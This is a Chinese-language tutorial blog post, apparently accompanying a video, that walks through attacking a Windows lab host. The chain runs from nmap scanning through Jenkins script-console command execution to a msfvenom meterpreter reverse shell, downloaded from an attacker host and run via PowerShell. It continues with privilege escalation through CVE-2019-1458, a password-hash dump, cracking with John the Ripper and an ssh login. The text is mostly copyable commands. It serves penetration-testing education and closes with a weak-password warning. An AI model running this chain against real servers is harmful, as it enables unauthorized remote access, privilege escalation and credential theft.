相关阅读
上期视频
破解密码相关内容
之前NetworkChuck带来的hashcat教程
猪猪又对hashcat做了补充,教大家如何通过hashcat破解office文档密码
反弹shell
工具与环境准备
你可以使用Kali linux自带的Metasploit渗透框架,也可以在windows上安装(推荐前者)
视频讲解
本期视频将以Jenkins脚本执行的漏洞为例,教大家如何在控制台完成反弹shell和权限提升,导出密码散列,最终通过john the ripper完成密码破解
图文讲解
使用Nmap进行信息收集
我们可以尝试对某个网段或者某个IP地址进行扫描
当然,在不考虑时间和性能的情况下,你也可以简单粗暴的
nmap 192.168.0.110
![图片[1]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418051748671-1024x540.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
背景知识:Jenkins
Jenkins是开源CI&CD软件领导者, 提供超过1000个插件来支持构建、部署、自动化, 满足任何项目的需要。
![图片[2]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418060811366.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们访问Jenkins的/script路径
可以看到这里有个脚本调试的地方,可以输入脚本
![图片[3]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052019237-1024x558.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
譬如我们输入
println new ProcessBuilder("cmd.exe","/C whoami").redirectErrorStream(true).start().text
![图片[4]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052105711-1024x281.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们可以看到返回值是
nt autority\local service
![图片[5]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052255617-1024x533.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这证明我们的脚本执行成功了,而且返回了windows电脑里cmd上显示的我们现在所处的用户组信息,当然还可以将whoami
改为ipconfig
,然后我们就可以看到返回的一些网络路由信息。
![图片[6]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052442955.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这时可以将上面的实验再继续延伸,我们可以使用metasploit渗透框架
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=4321 -f exe > hackerloix64.exe
![图片[7]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052715326-1024x170.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们可以通过Jenkins脚本执行的控制台下载我们刚刚生成的exe文件,看看能不能有新的玩法!
我们通过命令将文件下载下来
![图片[8]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418052836460-1024x225.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后启动metasploit渗透框架
sudo msfconsole
![图片[9]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418053006227.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后开始监听
use exploit/multi-handler
设置对应的payload
set payload/windows/x64/meterpreter/reverse_tcp
![图片[10]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418053158752.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后设置好IP和端口
set LHOST 192.168.0.192
set LPORT 4321
最后运行
run
![图片[11]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418053255828.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后在刚才的Jenkins脚本执行的控制台运行,点击Run
- 下载脚本
println new ProcessBuilder("powershell.exe","Invoke-WebRequest -Uri 'http://192.168.0.192:80/hackerloix64.exe' -Output 'C:\\Program Files\\jenkins\\Scripts\\hackaloix64.exe').redirectErrorStream(true).start().text
- 利用脚本(如果已经下载可以直接利用)
println new ProcessBuilder("hackerloix64.exe").redirectErrorStream(true).start().text
![图片[12]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418053325697-1024x496.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
一旦运行,我们在监听器里就可以看到已经连接上windows电脑的cmd了,我们可以输入相关的命令,譬如
getuid
![图片[13]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054122580.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
当然,你还可以输入
getprivs
![图片[14]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054220886.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
权限提升
我们会发现这里导出密码权限是不足的,因此我们需要进行提权
![图片[15]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054454830.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们输入下面的命令
session -i 1
ps
看看能不能通过转移来提升权限
migrate 488
![图片[16]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054716784.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
发现也不可以
![图片[17]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054748518.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这时我们使用metasploit的提权功能
use post/multi/recon/local_exploit_suggester
set SESSION 1
run -j
![图片[18]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418054903167.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
发现有可疑利用的漏洞!我们复制下来exploit/windows/local/cve_2019_1458_wizardopium
,然后输入下面命令
use exploit/windows/local/cve_2019_1458_wizardopium
输入show options
看下,如果没设置IP和端口要设置
set LHOST 192.168.0.192
set LPORT 4444
因为我们之前已经设置了这里就不再设置
![图片[19]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055020757.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后输入下面的命令
set SESSION 1
run -j
这里看到会话2被打开了
![图片[20]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055152511.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这里输入sessions
进行查看,看到权限已经不再是Local
了,而是System
管理员了
![图片[21]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055222634.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
那我们现在就可以导出密码了
use post/windows/gather/hashdump
set SESSION 2
run
![图片[22]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055259224.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
密码破解
有了这么多密码之后应该怎么做呢?
![图片[23]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055350100-1024x541.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们将上面的密码存储到tobecracked.txt
文件里
然后使用john the rapper进行密码破解
john --format=NT ./tobecracked.txt
![图片[24]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418055442631-1024x419.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后显示破解结果
john --format=NT ./tobecracked.txt --show
![图片[25]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418060230212.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这里可以看到账户和对应的密码均为vagrant
![图片[26]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418060428759.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
为了验证账户密码是正确的,我们通过ssh连接192.168.0.110进行测试
ssh vagrant@192.168.0.110
![图片[27]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418060352379.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后在隐藏的位置输入密码(Linux密码输入的时候不会显示****,因此不要以为自己没输入上
最终发现可以成功连接
![图片[28]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/04/20220418060603881.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
本期视频到此结束!请记得一定要摒弃弱口令,更换密码强度高一些的密码!
- 最新
- 最热
只看作者